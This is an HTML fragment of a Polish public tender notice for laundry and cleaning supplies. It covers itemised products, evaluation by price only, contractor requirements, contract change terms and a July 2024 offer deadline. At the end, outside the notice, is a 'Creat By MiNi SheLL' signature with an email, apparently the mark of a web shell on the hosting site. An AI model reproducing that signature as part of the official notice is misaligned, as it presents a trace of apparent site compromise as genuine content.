class="normal">Procentowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 3 - Dział Usług - Środki do prania w pralni<br/>1.	Płyn do prania- pojemność 25 kg, usuwa cięzkie zabrudzenia i trudne plamy,barwa różowa, rozpuszczalny w wodzie, hipoalergiczny, zapach kwiatowy, delikatny, roztwór pH 11-12,5% - TENSO	szt.	12,00<br/>2.	Wybielacz do tkanin- pojemność 20 kg, postać płynna, bezbarwny, zapach drażniący, pH 1,5-4/20 stopni C, miesza się w wodzie w stopniu nieograniczonym, temp. topnienia/ krzepnięcia -33 stopnie C roztwór 33%, początkowa temp wrzenia 108 stopni roztwór 35%. - WASH OXY PLUS	szt.	12,00<br/>3	Odplamiacz - wzmacniacz alkaliczności; - pojemność 25 kg, niepalny, całkowita rozpuszczalność w zimnej wodzie, gęstość względna 1.33g/cm sześcienny/20 stopni C, - WASH BOOSTER	szt.	10,00<br/>4	Płyn do płukania - pojemność 25kg, jako środek zmiękczający tkaniny, posatać płynna, barwa biała, zapach słodki, kwiatowy, rozpuszczalny w wodzie. - SAUVINOL	szt.	15,00<br/>5	Środek czyszczący/ myjący - dodatek do prania, zastosowanie w pralni przemysłowej, do pralnia profesjonalnego, pojemność 25kg, postać płynna, wygląd przejrzysty do mętnego, barwa jasnożółta lub burztynowa, rozpuszczalny w wodzie. HUMECTIL	szt.	8,00<br/>6	Proszek do prania- pojemność 20kg, usuwa ciężkie i silne zabrudzenia, stan skupienia stały, barwa biała, zapach przyjemny, kwiatowy, hipoalergiczny, rozpuszczalny w wodzie. - INTEGRAL szt.	12,00<br/>7	Chlor - pojemność 15kg, przeznaczony do usuwania bardzo trudnych zabrudzeń i plam, stan skuienia stały, w postaci tabletek, barwa biała, bez zapachu, nie może ulegać samozapłonmowi, całkowita rozpuszczalność w wodzie. - CLOROSAN	szt.	8,00<br/>8	Sól - pojemność 25kg, do zmiękczania wody	szt.	10,00 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39831000-6 - Preparaty piorące</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39137000-1 - Zmiękczacze wody</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 4 - Środki czystości - Dział Gastronomii, Sportu, Rehabilitacji, Usług - płyny, mleczka, żele<br/>1	Zagęszczony płyn czyszcząco dezynfekujący posiadający właściwości dezynfekujące i wybielające (zawiera podchloryn sodu). Zapobiegający powstawaniu osadów i zanieczyszczeń, usuwający nieprzyjemne zapachy oraz zwalczający wszelkie szkodliwe dla zdrowia drobnoustroje. Dzięki zagęszczonej konsystencji preparat dłużej przywiera do czyszczonej powierzchni, skuteczny przeciwko bakteriom, grzybom i wirusom. Może być używany bez rozcieńczenia - w kuchni, łazience, w toalecie oraz w okolicach otworów kanalizacyjnych, śmietników, jak i w rozcieńczeniu - do podłóg i płytek ceramicznych. Może być używany również do czyszczenia i dezynfekcji kabin i zasłon prysznicowych 1l. - DOMESTOS	szt.	638<br/>2	Gotowy do użycia płyn do mycia i odkamieniania powierzchni sanitarnych na bazie kwasu cytrynowego, przeznaczony do usuwania kamienia wapiennego, osadów mydła i innych zabrudzeń z powierzchni łazienkowych. Polecany do czyszczenia wanien prysznicy umywalek WC itp. 5l. - CIF WASHROOM CLEANER	szt.	8<br/>3	Gotowy do użycia płyn do mycia i odkamieniania powierzchni sanitarnych na bazie kwasu cytrynowego, przeznaczony do usuwania kamienia wapiennego, osadów mydła i innych zabrudzeń z powierzchni łazienkowych. Polecany do czyszczenia wanien prysznicy umywalek WC itp. 0, 75 l. - CIF WASHROOM CLEANER	szt.	16<br/>4	Środek o gęstej konsystencji do czyszczenia uporczywego brudu, osadów z kamienia, przypalonych resztek, pleśni, mydła, osadów z rdzy oraz uporczywych zabrudzeń pochodzenia tłuszczowego, zawierający aktywny tlen. 0,75 l. - CIF mleczko do czyszczenia	szt.	230<br/>5	Środek przeznaczony do mycia framug, szyb, luster i innych powierzchni szklanych, skutecznie usuwa kurz i brud, gwarantuje połysk bez smug, szybko schnący. Płyn szybkoschnący, na bazie alkoholu ze spryskiwaczem.0,5 l - CLIN płyn do czyszczenia okien + spryskiwacz	szt.	530<br/>6	Skoncentrowany preparat do mycia podłóg na bazie aktywnego tlenu. Produkt przeznaczony do mycia powierzchni ceramicznych, wykonanych z tworzyw sztucznych lub pomalowanych farba olejną, niezabezpieczonych podłóg, ścian, laminatów itp. Produkt pozostawia świeży, przyjemny zapach. Nie wymaga spłukiwania. Nie pozostawiający smug na mytej powierzchni. Mycie bieżące. Środek do mycia i pielęgnacji wszelkich zmywalnych powierzchni. Skutecznie usuwający zabrudzenia, nie pozostawiający smug, pozostawiający długotrwały przyjemny zapach. 5l. - CIF OXY GEL	szt.	82<br/>7	Płyn przeznaczony do czyszczenia kabin prysznicowych ze szkła lub plastiku, umywalek i toalet, armatury łazienkowej, powierzchni chromowych i zlewów ze stali nierdzewnej. Skutecznie usuwający - bez szorowania, kamień, rdzę, zacieki z twardej wody, osady z mydła i inne uporczywe zabrudzenia. 0,45 l - CILIT Kamień i rdza	szt.	150<br/>8	Żel przeznaczony do skutecznego usuwania osadów kamiennych, osadów z mydła i innych rodzajów brudu z glazury. Preparat powinien pozostawiać świeży zapach i czystą, lśniąca powierzchnię glazury, terakoty itp. 0,5 l AJAX żel do łazienek	szt.	185<br/>9	Środek do czyszczenia mebli. 0,4 l - PRONTO aerozol	szt.	56<br/>10	Odświeżacz powietrza elektryczny 0,02l. - BRISE	szt.	110<br/>11	Wkład/zapas 0,02l. - BRISE /do pozycji powyżej/	szt.	100<br/>12	Odświeżacz powietrza w aerozolu 0,30 l. - BRISE	szt.	75<br/>13	Środek przeznaczony do usuwania kamienia z urządzeń, opakowanie 25 kg - KAMIX	szt.	3<br/>14	Mydło w płynie o dobrych właściwościach myjących, antybakteryjne, białe, o miłym zapachu. 5l. - BARON	szt.	126<br/>15	Płyn do naczyń przyjemnym zapachu, skutecznie rozpuszczający brud, wytwarzający aktywną pianę i nadający połysk. 5l. - LUDWIK	szt.	78<br/>16	Preparat myjąco-dezynfekujący do nieinwazyjnych urządzeń medycznych oraz powierzchni nieporowatych. Posiada działanie bakteriobójcze, grzybobójcze, wirusobójcze, sporobójcze i pratkobójcze. 5l. - OXIVIR PLUS	szt.	5<br/>17	Preparat myjąco-dezynfekujący do nieinwazyjnych urządzeń medycznych oraz powierzchni nieporowatych. Posiada działanie bakteriobójcze, grzybobójcze, wirusobójcze, sporobójcze i pratkobójcze. 0,75 l. - OXIVIR PLUS	szt.	8<br/>18 Środek myjąco-dezynfekujący kwaśny o właściwościach bakterio i grzybobójczych, posiada właściwości myjące i okamieniające, stosowany do wanien w hydroterapii. 1 l. - GOLIAT	szt.	30<br/>19	Koncentrat o doskonałych właściwościach czyszcząco-odtłuszczających. Produktu można używać do mycia powierzchni wykonanych z plastiku, drewna, metalu, sztucznej skóry czy tapicerki. Skutecznie usuwa uciążliwe, tłuste zabrudzenia. Odświeża kolor i pozostawia świeży zapach. Koncentrat uniwersalny płyn czyszczący. 10 l - VINET	szt.	4<br/>20	Preparat do usuwania etykiet śladów po flamastrach w areozolu, środek do usuwania naklejek samoprzylepnych. 0,20 l. - LABEL OFF 50	szt.	15<br/>21	Płyn do czyszczenia pralek. 0,25 l BRYZA	szt.	5<br/>22	Odtłuszczacz uniwersalny, spray płyn. 0,75 l. MEGLIO	szt.	40<br/>23	Płyn do czyszczenia łazienki. Idealnie czyści: umywalki, wanny, kabiny prysznicowe, kafelki, toalety, szkło, powierzchnie ceramiczne, stal nierdzewną. Formuła skoncentrowana na kwasku cytrynowym usuwa 100% osadów z kamienia a substancje aktywne pochodzenia naturalnego. Poręczny spryskiwacz. 0,75 l. CILIT BANG spray	szt.	360<br/>24	Uniwersalny płyn do mycia na bazie alkoholu , nie pozostawiający smug, przeznaczony do powierzchni o wysokim połysku. 1 l. - KIEHL KERADET AKTIV	szt.	50<br/>25	Płyn uniwersalny do mycia dużych i gładkich powierzchni błyskawicznie przywraca czyszczonym miejscom blask, skutecznie usuwa zabrudzenia ze zlewów, kuchenek i umywalek pozostawiając na długo przyjemny zapach. 1 l. AJAX FLORAL FIESTA	szt.	220<br/>26	Srodek do usuwania pleśni, grzybów i nalotów. 0,5 l. - SAVO szt.	10<br/>27	Uniwersalny koncentrat do mycia doskonale usuwa silne zabrudzenia, dokładnie czysci głeboko osadzony brud. Pozostawia powierzchnie czyste i nadaje im delikatny połysk. Przeznaczony do wszystkich powierzchni zmywalnych. 5l. - TYTAN uniwersalny.	szt.	12<br/>28	Mydełka hotelowe, wga od 15 do 20 g, bezzapachowe, antyalergiczne, kolor biały lub kremowy.	szt.	2200<br/>29	Szmpon/żel do mycia ciała i włosów, pojemność od 20 do 30 ml, kolor płynu biały lub kremowy, bezzapachowy, antyalergiczny.	szt.	2500 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39831600-2 - Środki do czyszczenia toalet</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39831240-0 - Preparaty czyszczące</p> <p class="mb-0">39811100-1 - Odświeżacze powietrza</p> <p class="mb-0">33711900-6 - Mydło</p> <p class="mb-0">33631600-8 - Środki antyseptyczne i dezynfekcyjne</p> <p class="mb-0">39831220-4 - Środki odtłuszczające</p> <p class="mb-0">24457000-2 - Środki grzybobójcze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> dostarczane produkty muszą być wysokiej jakości, muszą spełniać wymagania jakościowe, dotyczące użytkowania, przechowywania, pakowania i transportu zawarte w polskich normach przenoszących normy europejskie oraz posiadać ważne terminy przydatności do użycia, a wykonawca powinien posiadać atesty i/lub pozwolenia potwierdzające, że poprzez odpowiednie odniesienie dokładnie oznaczone produkty będące przedmiotem dostawy odpowiadają wskazanym normom (wymagane jest posiadanie, w szczególności dokumentacji typu: karty charakterystyki, decyzje o dopuszczeniu do stosowania lub wpis na listę produktów biobójczych jeżeli jest obowiązkowe). Dokumenty zindywidualizowane dla danego produktu zostaną dostarczone w momencie pierwszej dostawy danego produktu. Wymagane jest złożenie odpowiedniego oświadczenia o treści wskazanej w pkt. 8 uzupełniającego formularza ofertowego - załącznik nr 2 do SWZ <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Oświadczenie o treści wskazanej w pkt. 8 uzupełniającego formularza ofertowego - załącznik nr 2 do SWZ <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenie zgodnie z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. (Dz.U. z 2023 r. poz. 1497) o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (dalej: UOBN) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oświadczenie o braku podstaw do wykluczenia składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Strony dopuszczają możliwość zmiany umowy w trakcie jej wykonywania w zakresie zmiany stawki podatku od towarów i usług (VAT) na podstawie odrębnych przepisów, które wejdą w życie po dniu zawarcia umowy, od dnia dokonania zmian przepisów w tym zakresie, proporcjonalnie do wprowadzonych zmian przepisów,<br/>2. Wniosek o dokonanie zmiany Umowy należy przedłożyć na piśmie, a okoliczności stanowiące podstawę zmiany Umowy powinny być uzasadnione, a w miarę możliwości również udokumentowane przez Wykonawcę.<br/>3. Zmiany Umowy, za wyjątkiem zmiany ustawowej stawki podatku od towarów i usług (VAT), o której mowa w ust. 1, nie mogą skutkować wzrostem cen jednostkowych brutto w ramach przedmiotu umowy.<br/>4. Zmiana postanowień zawartej Umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie, pod rygorem nieważności <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-29 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-29 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-27</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com